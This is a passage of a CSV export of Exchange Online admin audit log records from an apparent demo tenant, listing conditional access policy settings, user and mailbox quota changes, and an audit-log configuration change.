+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:32 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:32 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-20T06:04:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:32 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-31T02:19:26Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\b81afc79-520a-4143-bbc4-b8cadc11d007""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-03-31T02:19:28Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-03T08:31:38Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-03T01:33:29Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-02T18:52:21Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-02T06:33:17Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-01T20:17:03Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-02T11:33:14Z,,,Set-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""AdminAuditLogEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-02T11:33:12Z,,,Set-RecipientEnforcementProvisioningPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\Recipient Quota Policy""
+  },
+  {
+    ""Name"": ""PublicFolderHierarchyMailboxCountQuota"",
+    ""Value"": ""100""
+  }
+]"
+2020-05-02T11:33:09Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  }
+]"
+2020-05-02T11:32:50Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:46Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:42Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:38Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:37Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:33Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:29Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
